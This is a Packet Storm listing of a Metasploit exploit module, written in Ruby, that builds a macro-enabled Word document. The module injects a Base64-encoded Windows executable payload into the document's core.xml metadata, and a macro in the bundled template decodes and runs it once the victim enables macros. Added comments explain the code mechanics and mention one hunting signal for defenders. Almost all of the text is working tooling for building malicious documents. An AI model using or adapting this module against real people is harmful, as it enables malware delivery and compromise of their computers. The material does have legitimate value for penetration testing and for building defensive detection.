Microsoft Office Word Malicious Macro Execution

2017-02-08T00:00:00
ID PACKETSTORM:140972
Type packetstorm
Reporter sinn3r
Modified 2017-02-08T00:00:00

Description

                                        
##
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'rex/zip'  
  
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # FILEFORMAT is presumably what supplies file_create and the FILENAME
  # handling used in #exploit; EXE is presumably what supplies
  # generate_payload_exe used in #on_file_read.
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  # Registers module metadata and the two user-facing options.
  #
  # @param info [Hash] module info merged via update_info
  #
  # Options:
  #   BODY     - optional text substituted into document.xml; it is inserted
  #              verbatim (no XML escaping) by #on_file_read, so characters
  #              such as '<' or '&' would yield a malformed document part.
  #   FILENAME - name of the generated document; defaults to 'msf.docm'.
  def initialize(info={})
    super(update_info(info,
      'Name' => "Microsoft Office Word Malicious Macro Execution",
      'Description' => %q{
        This module generates a macro-enabled Microsoft Office Word document. The comments
        metadata in the data is injected with a Base64 encoded payload, which will be
        decoded by the macro and execute as a Windows executable.

        For a successful attack, the victim is required to manually enable macro execution.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'sinn3r' # Metasploit
        ],
      'References' =>
        [
          ['URL', 'https://en.wikipedia.org/wiki/Macro_virus']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          # No handler is started by default; the module only writes a file.
          'DisablePayloadHandler' => true
        },
      'Platform' => 'win',
      'Targets' =>
        [
          ['Microsoft Office Word', {}],
        ],
      'Privileged' => false,
      'DisclosureDate' => "Jan 10 2012",
      'DefaultTarget' => 0
    ))

    register_options([
      OptString.new("BODY", [false, 'The message for the document body', '']),
      OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
    ], self.class)
  end


  # Reads one template file, fills in its placeholders, and yields the
  # (possibly renamed) archive entry name together with the file contents.
  #
  # @param short_fname [String] entry name relative to the template root;
  #   NOTE: it is mutated in place (gsub!) when it matches /__rels/, so the
  #   caller's string changes too.
  # @param full_fname [String] path of the template file on disk
  # @yield [fname, buf] archive entry name and the rewritten contents
  def on_file_read(short_fname, full_fname)
    buf = File.read(full_fname)

    case short_fname
    when /document\.xml/
      # BODY is passed as a gsub! replacement string, so backslash sequences
      # (e.g. '\1') in it are interpreted rather than copied literally, and
      # no XML escaping is applied.
      # NOTE(review): the placeholder "DOCBODYGOESHER" differs in form from
      # "PAYLOADGOESHERE" below — confirm it matches the template's
      # document.xml exactly, otherwise BODY is silently never inserted.
      buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
    when /core\.xml/
      # Base64 of the generated EXE, preceded by 55 spaces; the reason for the
      # fixed-width prefix is not visible here — presumably the macro expects
      # the encoded data at that offset; TODO confirm against the template.
      # Defensive observation: a long Base64 blob inside the core.xml
      # properties part of a .docm is a useful hunting signal for documents
      # built this way.
      b64_payload = ' ' * 55
      b64_payload << Rex::Text.encode_base64(generate_payload_exe)
      buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
    end

    # The original filename of __rels is actually ".rels".
    # But for some reason if that's our original filename, it won't be included
    # in the archive. So this hacks around that.
    # (Likely cause: Dir[] does not match dot-files by default, so a ".rels"
    # template file would be skipped by the glob in #package_docm.)
    case short_fname
    when /__rels/
      short_fname.gsub!(/\_\_rels/, '.rels')
    end

    yield short_fname, buf
  end


  # Walks the template directory and builds the .docm (a zip archive).
  #
  # Directories become bare entries; regular files are passed through
  # #on_file_read so placeholders are substituted before being added.
  #
  # @param path [String] template root directory
  # @return [String] the packed zip archive bytes (result of zip.pack)
  def package_docm(path)
    zip = Rex::Zip::Archive.new

    Dir["#{path}/**/**"].each do |file|
      # Entry name relative to the template root (path+'/' is stripped once).
      p = file.sub(path+'/','')

      if File.directory?(file)
        print_status("Packaging directory: #{file}")
        zip.add_file(p)
      else
        on_file_read(p, file) do |fname, buf|
          print_status("Packaging file: #{fname}")
          zip.add_file(fname, buf)
        end
      end
    end

    zip.pack
  end


  # Builds the document from the bundled template directory and writes it
  # out via file_create under the FILENAME option, then defers to super.
  def exploit
    print_status('Generating our docm file...')
    path = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
    docm = package_docm(path)
    file_create(docm)
    super
  end

end